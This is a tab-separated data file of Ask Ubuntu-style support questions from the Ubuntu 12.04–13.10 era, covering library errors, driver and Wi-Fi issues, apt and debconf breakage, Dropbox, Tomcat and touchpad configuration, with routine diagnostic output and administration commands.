427496	error while loading shared libraries : libgthread-2.0.so.0	i was trying to try run ida debugger on my ubuntu 13.10 [ 64 bit ] and many `` error while loading shared libraries '' showed up . i installed 32 bit libraries and resolved them but i 'm stuck with the libgthread-2.0.so.0 . i tried to download and install the .deb package from here , but upon installation software center says already a new version is installed any ideas how to resolved this. ? [ edit 1 ] solution the problem was the ida is looking for 32 bit libraries and what i had on my system was 64 bit libraries and what i downloaded was also 64 bit , that is why software center said it already exist . so solution is to install 32 bit variant of the library step 1 : find the package that includes this library # dpkg -s libgthread-2.0.so.0 libglib2.0-0 : amd64 : /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0 step 2 : install 32 bit version of the same so add i386 instead of amd 64 . # apt-get install libglib2.0-0 : i386 now everything works fine..
427497	unity launcher wo n't hide	first question asked on this site . just did a fresh install of ubuntu 13.10 from wiping the hdd , had it installed before with the same hardware and did n't have this issue . for some reason i 'm unable to hide the launcher or change the icon sizes . i browsed through some old questions on here and it seemed a lot of people were running unity 2d , is there any way to check if i 'm using it ? my gpu is an ati radeon hd 6870 , i tried both proprietary and open drivers , but i did n't have this issue previous install just yesterday . when i first sign in the launcher flashes purple also , if that could help . have nothing installed besides what comes with a fresh install of ubuntu 13.10 .
427498	error instaling ubuntu 13.10	friends i 'm trying to install ubuntu 13.10 32-bit on a hp laptop with amd sempron processor and 1.5 gb of ram and the problem is that about 8 hours ago the installation process is frozen at the stage of `` setting bcmwl-kernel-source `` ... is it normal that or something is wrong with the installation ? . thanks
427499	0 % [ connecting to us.archive.ubuntu.com ]	i 'm doing a project for college where i have to host a specific piece of software on a ubnutu server and allow any hosts on the server 's network to install the software . when my server 's network adapter was set to nat , apt-get install worked just fine . i switched over to host-only to allow the host vm to install the software . when i switched the server back over to nat , i noticed that the apt-get install was getting stuck at 0 % . i ca n't seem to find a solid answer to this . i know the server 's are n't down as i 'm able to install packages on my other server vm just fine when in nat . one option i was give was to switch the server 's interface from a static ip address to dhcp , but the host needs to know the server 's ip address to download the packages .
427501	ppa for ghc 7.6	i was wondering if there is some decently trusted ppa of ghc 7.6 ? preferably the newest . i want a decently recent haskell platform without having to build from source . i am not experienced enough with linux to want to bother with my own installations of important software , which would probably be unstructured and ad-hoc . is n't that what package managers are for , after all ?
427504	develop apps for ubuntu touch : learning by doing	i really want to develop apps for ubuntu touch . i have set up the ubunut sdk and i am currently reading tutorials about qml but one will not learn programming by reading books or tutorials so i am looking for like little tasks ( with solutions ) , which focus on qml and ubuntu touch.you do n't get alot of information about how ubuntu touch works and how you combine the different languages . is there any way , which makes the start easier ? i really need an overview of how the whole thing works and finally start doing something .
427506	is there a way to change the application icon theme ?	it is relatively simple to change the overhead statusbar icon theme ; i know how to do this . how can i change the icon theme used in many of the ubuntu applications ' controls to something less outdated-looking ? ( the one i have selected for use in the statusbar is fine and quite modern [ flat is the new raised ] , but it does not match applications ' toolbar buttons . ) if there is a way ... are there any icon themes that are renowned for closely following the latest icon design trends ?
427507	live- rw & home-rw partitions not recognised by persistent live usbs	0 down vote no matter which way i produce a live usb , unless i set up a home-rw partition on the hard drive it will not let me login into the persistent option . system will not recognise the casper-rw or home-rw partitions on the usb stick ? if i do not set up a home-rw partition on the the hard drive , the persistent boot option always opens at a login screen , at which there is no way to login correctly ( or none i have found ) . i have used unetbottin , live usb creator , and diffrent size and brands of usb keys with the same result . i have not used the dd command in the terminal to write the iso to a usb as i can not figure out how to make it bootable yet . currently using a sandisk usb stick with 5gb fat32 boot , 14 gb ext2 primary casper-rw , and 13gb ext2 primary home-rw . i can boot into the live version no problem , and it just mounts the other partions as normal , just like it does if i boot into persistent with the home-rw hard drive . any ideas ? robert
427508	purple screen on ubuntu 12.04	the issue happened after i installed amd drivers from their website for linux . all went well for 3 days or so . now after i removed all the java files from my computer to start with a fresh download/install i get stuck on the purple screen . it is the one with the ubuntu logo and the 5 dots underneath it that go purple when it 's loaded . it is frozen on this screen . i have tried to press ctrl + alt + f1 to get into the console but it does n't work the only way for me to get into there is via recovery mode and i have tried quite a few suggestions from here . i think i am going to have to re install it i did n't really have any data on there anyway so i do n't care if i lose it . what will stop this from happening again ? is 13.10 more stable ? thank you .
427509	'file -- mime-type ' vs 'mimetype ' for php files	i 'm trying to understand the difference between file -- mime-type and mimetype . they are giving me different results on ubuntu 12.04.4 lts for this simple php file . < ? php echo 'hello world ! ' ; ? > now when i use mimetype and file to get the type of the file , i get : $ mimetype -b test.php application/x-php $ file -b -- mime-type test.php test/x-php this question ( 'file -- mime-type ' and 'mimetype ' commands returning different results ) says that file uses /etc/mime.types however : $ grep php /etc/mime.types application/x-httpd-php phtml pht php application/x-httpd-php-source phps application/x-httpd-php3 php3 application/x-httpd-php3-preprocessed php3p application/x-httpd-php4 php4 application/x-httpd-php5 php5 i 'm most curious about why file sees it as a text file . this is causing me problems in rails as ruby 's mime type also sees it as type application .
427510	image of hard drive for replication to laboratory computers	we have a laboratory of 100 systems where the same set of software is to be installed . some of the systems may have different capacities of hdds ( i.e . 320 gb , 500 gb , 1 tb ) . i have the following question regarding this ( command specific answers required ) : what process is to be taken to create the image of the hdd 's ? can that image be used to create a network based booting system ? if yes , what are the network requirements ? do the sizes of the hdd have to be same for creating and cloning the systems ?
427513	how to deleting files depending on their usage ?	how can i use a script in order to delete files according to how much i using them ? there are a large amount of files under a directory . i would like to preserve such files which i use ( open ) very often . i would like to delete those , which i did not use in a certain period .
427515	sdhc vs sdxc cards for linux	i recently bought a zenbook prime of 128gb and i bought a microsd to sd adapter for macbook air ( because of the low profile ) . it 's working great with my sdhc that i had on the phone . i 'm thinking about buying this microsd card . however , is sdxc supported in linux ? and is sdhc fully supported ? now i know it just works , but which one is preferred for linux ? the speed is not that important since it 's mainly for music , documents and pictures ( programs and videos will be in the main ssd ) . as we 're on it , would higher capacity , like 128gb micro sdxc make any difference ? if i buy any of them , i will write about them here , but i wanted to know if anyone had experience on microsdxc or read any review on these cards . i could n't find anything relevant about linux/ubuntu . according to sandisk website , the differences are : sdhc capacities range from 4gb to 32gb default format : fat32 sdxc capacities range from 64gb to 2tb default format : exfat the section about operating systems that support exfat file system does not even mention linux . furthermore , i 'm interested about exfat on sd cards , not about simple exfat support on linux , in case they differ .
427519	installing 64 bit ubuntu after having used 32 bit lead to errors in dropbox because of differing architectures	i installed ubuntu 32 bit , even though i really wanted to install 64 bit . so now i 've installed ubuntu 64 bit in its place . i had /home on its own partition , so that stayed the same . i 've installed dropbox , and tried to start it with dropbox start this gives the following error : starting dropbox ... traceback ( most recent call last ) : file `` dropbox/client/main.py '' , line 13 , in file `` autogen_explicit_imports.py '' , line 13 , in file `` ui/common/selective_sync.py '' , line 6 , in file `` arch/init.py '' , line 28 , in file `` arch/linux/tracing.py '' , line 8 , in file `` hard_trace.py '' , line 6 , in file `` client_api/connection_hub.py '' , line 21 , in file `` client_api/kv_connection.py '' , line 23 , in file `` pylinux/init.py '' , line 45 , in file `` cffi/api.py '' , line 55 , in init importerror : /home/kristoffer/.dropbox-dist/cffi-0.7.2-py2.7-linux-i686.egg/_cffi_backend.so : wrong elf class : elfclass32 notice especially this line : importerror : /home/kristoffer/.dropbox-dist/cffi-0.7.2-py2.7-linux-i686.egg this seems to suggest that the problem is that i have another architecture , so to speak . to get rid of this error , and whatever issues it might lead to , should i perhaps delete this file , or maybe even the whole .dropbox-dist directory ? or might it be that that might make things worse ? maybe remove the dot-directories , uninstall dropbox and then install it again ? update it turns out that the .dist-dropbox had two directories of interest : cffi-0.7.2-py2.7-linux-i686.egg cffi-0.7.2-py2.7-linux-x86_64.egg i chose to try to just remove the directory that probably would be defunct in my new installation : rm -rf cffi-0.7.2-py2.7-linux-i686.egg after that , i ran dropbox start and i was able to set up dropbox as per usual . ( i would rather answer and accept this answer than to use an update , but i would have to wait 8 hours in order to do that . )
427521	dell xps l501x wireless network issue	i 'm very keen to get started using ubuntu 12.04 but am struggling with getting the wifi working on my dell xps l501x machine . the problem is that i ca n't select a wireless network because it says device not ready when i click on the wifi signal up the top right , do n't have enough reputation to include an image sorry . i 've tried to solve the issue following the instructions at ubuntu help . below is the output of the key commands from these instructions , i would really appreciate if someone could offer me some advice . darren @ minion : ~ $ nm-tool networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : f0:4d : a2:5b : e5:33 capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : unavailable default : no hw address : 00:26 : c7:9a:53 : e6 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points darren @ minion : ~ $ sudo lshw -c network [ sudo ] password for darren : *-network disabled description : wireless interface product : centrino wireless-n 1000 [ condor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : 00:26 : c7:9a:53 : e6 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-17-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:56 memory : f0500000-f0501fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 06 serial : f0:4d : a2:5b : e5:33 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:53 ioport:5000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff darren @ minion : ~ $ lsmod module size used by rfcomm 74718 12 bnep 24107 2 parport_pc 32866 0 ppdev 17711 0 snd_hda_codec_hdmi 41736 4 arc4 12573 2 iwldvm 244387 0 mac80211 623607 1 iwldvm joydev 17613 0 snd_hda_codec_realtek 57149 1 nouveau 979899 3 ttm 84837 1 nouveau snd_hda_intel 57134 5 lp 17799 0 snd_hda_codec 194817 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel drm_kms_helper 53237 1 nouveau uvcvideo 82247 0 iwlwifi 179516 1 iwldvm videobuf2_core 40815 1 uvcvideo videodev 138562 2 uvcvideo , videobuf2_core i7core_edac 24565 0 videobuf2_vmalloc 13216 1 uvcvideo parport 42466 3 parport_pc , ppdev , lp drm 306660 5 nouveau , ttm , drm_kms_helper edac_core 62944 1 i7core_edac snd_hwdep 13613 1 snd_hda_codec snd_pcm 107140 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec videobuf2_memops 13362 1 videobuf2_vmalloc mei_me 18418 0 lpc_ich 21163 0 snd_seq_midi 13324 0 snd_rawmidi 30416 1 snd_seq_midi dell_wmi 12761 0 sparse_keymap 13890 1 dell_wmi psmouse 104093 0 mei 78537 1 mei_me dell_laptop 17425 0 mac_hid 13253 0 btusb 28374 0 dcdbas 14936 1 dell_laptop i2c_algo_bit 13564 1 nouveau intel_ips 18520 0 mxm_wmi 13021 1 nouveau wmi 19256 3 nouveau , dell_wmi , mxm_wmi serio_raw 13413 0 video 19574 1 nouveau snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 66061 2 snd_seq_midi , snd_seq_midi_event bluetooth 391726 24 rfcomm , bnep , btusb snd_timer 29989 2 snd_pcm , snd_seq snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq snd 73753 21 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_seq_midi , snd_rawmidi , snd_seq , snd_timer , snd_seq_device cfg80211 499466 3 iwldvm , mac80211 , iwlwifi soundcore 12680 1 snd snd_page_alloc 18798 2 snd_hda_intel , snd_pcm ahci 30063 3 r8169 73299 0 libahci 32118 1 ahci mii 13981 1 r8169 darren @ minion : ~ $ sudo iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off darren @ minion : ~ $ sudo iwlist scan eth0 interface does n't support scanning . lo interface does n't support scanning . wlan0 interface does n't support scanning : network is down darren @ minion : ~ $ rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no wild man helpfully suggested i run his script , see comment below . the results of this can be seen here . upon seeing the results i was asked the run another command : darren @ minion : ~ $ md5sum /lib/firmware/iwlwifi-1000-5.ucode 9f81a060ed274f76cd605295da77f7a6 /lib/firmware/iwlwifi-1000-5.ucode i 'll edit this answer again once wild man responds .
427522	creating an ubuntu boot drive boot-able on mac from ubuntu ?	is there any way to create an ubuntu boot drive compatible with a mac computer without using said mac to create it ? i tried using the boot drive i usually use , but that did not work . my friend 's mac broke to some extent and wo n't boot into os x , and he has some very important documents on there , so i want to see if i can retrieve any documents by using a boot drive . last resorts are ripping out the hd/ssd and plugging that into another computer .
427524	install multiple ppas at once via terminal without using script	i want to add these four ppa 's to my machine . sudo add-apt-repository ppa : noobslab/malys-themes sudo add-apt-repository ppa : alecive/antigone sudo add-apt-repository ppa : nitrux/nitrux-artwork sudo add-apt-repository ppa : upubuntu-com/themes instead of adding them one-at-a-time , i thought i would list them one after another - like we do when installing apps . sudo add-apt-repository ppa : noobslab/malys-themes ppa : alecive/antigone ppa : nitrux/nitrux-artwork ppa : upubuntu-com/themes but it returned an error : error : need a repository as argument i searched around and saw this question how to install multiple ppas and applications at once ? but it proposes a bash script as a solution . is there a way to add multiple ppa 's at once without using a script ? edit am just curious , why doesn't sudo add-apt-repository ppa : noobslab/malys-themes ppa : alecive/antigone ppa : nitrux/nitrux-artwork ppa : upubuntu-com/themes work but sudo apt-get install moka-icon-theme moka-icon-theme-blue moka-icon-theme-dark malys-deda awoken-icon-theme nitrux-icon-theme nouvegnomegray works ? edit 2 is there any workaround where sudo add-apt-repository ppa : noobslab/malys-themes ppa : alecive/antigone ppa : nitrux/nitrux-artwork ppa : upubuntu-com/themes can be made to work ? and i totally understand the risks here .
427525	why do i have to detect displays for my 2nd display each time i resume from suspend ?	i am using ubuntu 12.04 with saucy hwe and nvidia 331.20 with geforce 310 . i have two identical 1440x900 displays . nearly each time i resume from suspend , i have to detect displays to get my 2nd display to come back . sometimes i have to press the button several times and sometimes i get unknown display for the second display and the resolution is at 640x480 until i press detect displays a few more times . the primary display is connected with dual link dvi , and the second display is connect with single link dvi adapter to display port on the graphics card . is this normal , or does anyone have any suggestions ?
427529	compiling with yacc library liby.a	i hope that if someone has this library in dynamic , you might not have the problem . this library on other unixes use fprintf . i installed bison and it calls yyerror and back at square one again . the broken link is that it calls rpl_fprintf ( ) . so i created a routine to fix the thing : int rpl_fprintf ( file *stream , const char *format , ... ) { int n ; va_list ap ; va_start ( ap , format ) ; n = vfprintf ( stream , format , ap ) ; va_end ( ap ) ; return n ; } it fixes the problem on my ubuntu release 12.04 lts 32-bit . i hope that someone has the code for the lib that can compile it again .
427531	usb 3.0 coping with slow speed on ubuntu as opposed to windows	in my toshiba e329786 usb 3.0 port , ubuntu speeds are slower , like 3mbps - 5mbps , than in a different pc running windows 7 , like 100mbps - 120mbps . how can i increase the speeds in ubuntu ? ? output of lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 0a81:0101 chesen electronics corp . keyboard bus 001 device 004 : id 046d : c05a logitech , inc. optical mouse m90 bus 002 device 004 : id 0fce:7172 sony ericsson mobile communications ab
427532	how to resolve a problem when eclipse is adding a server ? unknown version of tomcat was specified	when i add directory of tomcat7 installation directory , i got . unknown version of tomcat was specified . default tomcat7 directory is /etc/tomcat7 but this directory is lacking some binary folders i already have in /opt/tomcat7 where i extract tomcat7 downloaded . which are the permissions that the directory should have ? now it has root : root as user : group directly when i extracted them . i add symbolic link in /etc/tomcat7 to some folders from /opt/tomcat7 that it has not by doing this /etc/tomcat/tomcat7 $ sudo ln -s /opt/apache-tomcat-7/conf conf /etc/tomcat/tomcat7 $ sudo ln -s /opt/apache-tomcat-7/lib lib /etc/tomcat/tomcat7 $ sudo ln -s /opt/apache-tomcat-7/logs logs /etc/tomcat/tomcat7 $ sudo ln -s /opt/apache-tomcat-7/webapps webapps /etc/tomcat/tomcat7 $ sudo ln -s /opt/apache-tomcat-7/work work and the links have the same permissions , as root . is the server using a default user or group to execute this that is not allowed to do with root permission ? system specifications : ubuntu 12.04 eclipse kepler tomcat 7.0.50
427533	how to get a dell xps de to recognise the cypress touchpad under ubuntu 13.10 ?	i have recently bought a dell xps 13 developer edition ( also known as sputnik ) , supplied with ubuntu 12.04 . i 've wiped that and installed 13.10 from scratch . i believe all the code improvements made by dell have now been incorporated into the mainline kernel , so in theory everything should work without additional ppas . however , the touchpad works as a mouse-like input device ( i have a pointer , i can left-click and can touch to click ) but there is no gesture support . i 'm particularly looking for two-finger scroll . also , the typing cursor frequently jumps about , and from what i have read on the web , the sensitivity of the trackpad may be responsible . if a suitable device is available , ubuntu should show extra trackpad options in system settings - > mouse & touchpad , but i just get the usual ones ( primary button , double click [ speed ] and mouse speed ) . here is a snippet from cat /proc/bus/input/devices : i : bus=0018 vendor=06cb product=2734 version=0100 n : name= '' dll060a:00 06cb:2734 '' p : phys= s : sysfs=/devices/pci0000:00/int33c3:00/i2c-8/8-002c/input/input12 u : uniq= h : handlers=mouse1 event12 b : prop=0 b : ev=17 b : key=30000 0 0 0 0 b : rel=3 b : msc=10 and from xinput : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synaptics synaptics large touch screen id=9 [ slave pointer ( 2 ) ] ⎜ ↳ dll060a:00 06cb:2734 id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 synaptics touchpad id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=13 [ slave keyboard ( 3 ) ] ↳ integrated_webcam_hd id=14 [ slave keyboard ( 3 ) ] and a snippet from x logs ( /var/log/xorg.0.log ) : [ 25.877 ] ( ii ) config/udev : adding input device dll060a:00 06cb:2734 ( /dev/input/event12 ) [ 25.877 ] ( ** ) dll060a:00 06cb:2734 : applying inputclass `` evdev pointer catchall '' [ 25.877 ] ( ii ) using input driver 'evdev ' for 'dll060a:00 06cb:2734' [ 25.877 ] ( ** ) dll060a:00 06cb:2734 : always reports core events [ 25.877 ] ( ** ) evdev : dll060a:00 06cb:2734 : device : `` /dev/input/event12 '' [ 25.888 ] ( -- ) evdev : dll060a:00 06cb:2734 : vendor 0x6cb product 0x2734 [ 25.888 ] ( -- ) evdev : dll060a:00 06cb:2734 : found 3 mouse buttons [ 25.888 ] ( -- ) evdev : dll060a:00 06cb:2734 : found relative axes [ 25.888 ] ( -- ) evdev : dll060a:00 06cb:2734 : found x and y relative axes [ 25.888 ] ( ii ) evdev : dll060a:00 06cb:2734 : configuring as mouse [ 25.888 ] ( ** ) evdev : dll060a:00 06cb:2734 : yaxismapping : buttons 4 and 5 [ 25.888 ] ( ** ) evdev : dll060a:00 06cb:2734 : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 25.888 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/int33c3:00/i2c-8/8-002c/input/input12/event12 '' [ 25.888 ] ( ii ) xinput : adding extended input device `` dll060a:00 06cb:2734 '' ( type : mouse , id 11 ) [ 25.889 ] ( ii ) evdev : dll060a:00 06cb:2734 : initialized for relative axes . [ 25.889 ] ( ** ) dll060a:00 06cb:2734 : ( accel ) keeping acceleration scheme 1 [ 25.889 ] ( ** ) dll060a:00 06cb:2734 : ( accel ) acceleration profile 0 [ 25.889 ] ( ** ) dll060a:00 06cb:2734 : ( accel ) acceleration factor : 2.000 [ 25.889 ] ( ** ) dll060a:00 06cb:2734 : ( accel ) acceleration threshold : 4 [ 25.889 ] ( ii ) config/udev : adding input device dll060a:00 06cb:2734 ( /dev/input/mouse1 ) [ 25.889 ] ( ii ) no input driver specified , ignoring this device . it looks like it is doing something but the `` ignoring this device '' waves a red flag for me . also , the device comes up as a hex string rather than being seen as a `` cypress '' pad - it seems it should show like this in gpointing-device-settings . i 've searched for some possible strings in dmesg and found these : jon @ jon-xps13-9333 : ~ $ dmesg | grep synap [ 1412.350563 ] psmouse serio1 : synaptics : device claims to have extended capabilities , but i 'm not able to read them . [ 1412.550727 ] psmouse serio1 : synaptics : device claims to have extended capability 0x0c , but i 'm not able to read it . [ 1412.951089 ] psmouse serio1 : synaptics : unable to initialize device . [ 15884.370843 ] psmouse serio1 : synaptics : unable to query device . [ 17513.516033 ] psmouse serio1 : synaptics : unable to query device . [ 41102.794436 ] psmouse serio1 : synaptics : unable to query device . jon @ jon-xps13-9333 : ~ $ dmesg | grep trackpad jon @ jon-xps13-9333 : ~ $ dmesg | grep cypr furthermore , i 've noticed that i appear to have two touchpad devices erroneously detected . at first i mistook one for the touchscreen being wrongly reported , but in fact that is reported fine . the output of xinput above reveals the issue , as does gpointing-device-settings : i realised i 'd made the assumption that i have a cypress touchpad just by looking on the web , so i thought i 'd try the synaptiks application as well . this reports an error and will not start : no touchpad found no touchpad was found in this system . if the system has a touchpad , please make sure that the synaptics driver is properly installed and configured . so for the time being , i 'll continue to assume i have a cypress pad that requires a cypress driver .
427536	ruby on rails on ubuntu 13.04 using rvm	i am trying to get webrick to work rvm gemset list gemsets for ruby-1.8.7-p374 ( found in /home/simon/.rvm/gems/ruby-1.8.7-p374 ) ( default ) global = > simple_cms my gem list gem list *** local gems *** abstract ( 1.0.0 ) actionmailer ( 3.0.0 ) actionpack ( 3.0.0 ) activemodel ( 3.0.0 ) activerecord ( 3.0.0 ) activeresource ( 3.0.0 ) activesupport ( 3.0.0 ) arel ( 1.0.1 ) builder ( 2.1.2 ) bundler ( 1.0.0 ) bundler-unload ( 1.0.2 ) erubis ( 2.6.6 ) executable-hooks ( 1.3.1 ) gem-wrappers ( 1.2.4 ) i18n ( 0.4.2 ) mail ( 2.2.20 ) mime-types ( 1.25.1 ) mysql2 ( 0.3.15 ) polyglot ( 0.3.4 ) rack ( 1.2.8 ) rack-mount ( 0.6.14 ) rack-test ( 0.5.7 ) rails ( 3.0.0 ) railties ( 3.0.0 ) rake ( 10.1.1 ) rubygems-bundler ( 1.4.2 ) rvm ( 1.11.3.9 ) thor ( 0.14.6 ) treetop ( 1.4.15 ) tzinfo ( 0.3.38 ) and when i the to run rails s to stalt webrick i got rails s /home/simon/.rvm/gems/ruby-1.8.7-p374 @ global/gems/rubygems-bundler-1.4.2/lib/rubygems-bundler/noexec.rb:74 : in `setup ' : undefined method `rubygems ' for bundler : module ( nomethoderror ) from /home/simon/.rvm/gems/ruby-1.8.7-p374 @ global/gems/rubygems-bundler-1.4.2/lib/rubygems-bundler/noexec.rb:114 : in `check' from /home/simon/.rvm/gems/ruby-1.8.7-p374 @ global/gems/rubygems-bundler-1.4.2/lib/rubygems-bundler/noexec.rb:121 from /home/simon/.rvm/rubies/ruby-1.8.7-p374/lib/ruby/site_ruby/1.8/rubygems/core_ext/kernel_require.rb:118 : in `gem_original_require' from /home/simon/.rvm/rubies/ruby-1.8.7-p374/lib/ruby/site_ruby/1.8/rubygems/core_ext/kernel_require.rb:118 : in `require' from /home/simon/.rvm/gems/ruby-1.8.7-p374 @ global/gems/rubygems-bundler-1.4.2/lib/rubygems_executable_plugin.rb:4 from /home/simon/.rvm/gems/ruby-1.8.7-p374 @ global/gems/executable-hooks-1.3.1/lib/executable-hooks/hooks.rb:50 : in `call' from /home/simon/.rvm/gems/ruby-1.8.7-p374 @ global/gems/executable-hooks-1.3.1/lib/executable-hooks/hooks.rb:50 : in `run' from /home/simon/.rvm/gems/ruby-1.8.7-p374 @ global/gems/executable-hooks-1.3.1/lib/executable-hooks/hooks.rb:49 : in `each' from /home/simon/.rvm/gems/ruby-1.8.7-p374 @ global/gems/executable-hooks-1.3.1/lib/executable-hooks/hooks.rb:49 : in `run' from /home/simon/.rvm/gems/ruby-1.8.7-p374 @ simple_cms/bin/ruby_executable_hooks:10 thanks for simon in norway
427537	vlc player broken installation	i tried to install vlc player with software center . unfortunately my lost my network connection . so the downloading failed . after getting the network connection i tried again to install . now the problem arises . the progress tab shows downloading 0 bytes of 158 bytes and no downloading is happening . after sometimes an error window pops up and tells and check your internet connetcion . i tried after shutdown , update packages , so many times . need vlc and need help .
427538	e : can not get debconf version . is debconf installed ?	i installed java 7 and later i got troubles with my system , i ca n't update anymore . the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : 1 ) sudo dpkg -- check == > no results , does not recognise command 2 ) sudo apt-get check reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc6 : depends : libgcc1 but it is not installed depends : tzdata but it is not installed e : unmet dependencies . try using -f. 3 ) apt-cache policy debconf debconf : installed : ( none ) candidate : 1.5.42ubuntu1 version table : 1.5.42ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ precise/main i386 packages 4 ) apt-get install -f the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.15-0ubuntu10.5 ) but 2.15-0ubuntu10.5 is installed depends : libgcc1 but it is not installed depends : tzdata but it is not installed sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : apt-utils coreutils debconf debconf-i18n dpkg libacl1 libapt-inst1.4 libapt-pkg4.12 libattr1 libbz2-1.0 libdb5.1 libgcc1 liblocale-gettext-perl liblzma5 libselinux1 libstdc++6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl perl-base tar tzdata xz-utils zlib1g suggested packages : debconf-doc debconf-utils whiptail dialog gnome-utils libterm-readline-gnu-perl libgtk2-perl libnet-ldap-perl libqtgui4-perl libqtcore4-perl apt bzip2 ncompress xz-lzma the following new packages will be installed : apt-utils coreutils debconf debconf-i18n dpkg libacl1 libapt-inst1.4 libapt-pkg4.12 libattr1 libbz2-1.0 libdb5.1 libgcc1 liblocale-gettext-perl liblzma5 libselinux1 libstdc++6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl perl-base tar tzdata xz-utils zlib1g 0 upgraded , 24 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/9303 kb of archives . after this operation , 29.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_time = `` de_ch.utf-8 '' , lc_monetary = `` de_ch.utf-8 '' , lc_address = `` de_ch.utf-8 '' , lc_telephone = `` de_ch.utf-8 '' , lc_name = `` de_ch.utf-8 '' , lc_measurement = `` de_ch.utf-8 '' , lc_identification = `` de_ch.utf-8 '' , lc_numeric = `` de_ch.utf-8 '' , lc_paper = `` de_ch.utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_all to default locale : no such file or directory e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory dpkg : regarding ... /libgcc1_1 % 3a4.6.3-1ubuntu5_i386.deb containing libgcc1 , pre-dependency problem : libgcc1 pre-depends on multiarch-support multiarch-support is unpacked , but has never been configured . dpkg : error processing /var/cache/apt/archives/libgcc1_1 % 3a4.6.3-1ubuntu5_i386.deb ( -- unpack ) : pre-dependency problem - not installing libgcc1 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/libgcc1_1 % 3a4.6.3-1ubuntu5_i386.deb e : internal error , no file name for libc6 w : could not perform immediate configuration on 'multiarch-support : i386 ' . please see man 5 apt.conf under apt : :immediate-configure for details . ( 2 ) e : sub-process /usr/bin/dpkg returned an error code ( 1 )
427539	ace of spades - cant change weapons	please help me with a problem . i have installed xubuntu with playonlinux . the virtual drive of playonlinux i installed steam , directx9- 11 , .net 1.1-4.0 , vc++ , xinput and other libraries . the game starts and runs , but lag . and the main problem - i can not change weapon in the game . i can walk , run , die , but not to change weapons , reload . it feels like missing some libraries . reading the comments of users here https : //www.youtube.com/watch ? v=treplprl4fq ( these users had the same problem ) , i tried to reinstall .net . but it did not help . thanks in advance and sorry for the google translate . and i use steam version of game .
427541	apt-get update command gives an error !	i am new at ubuntu in the terminal i can not run sudo apt-get update , the following error is . e : malformed line 1 in source list /etc/apt/source.list.d/virtual box . list ( list parse ) e : the list of source could not be read . thanks .
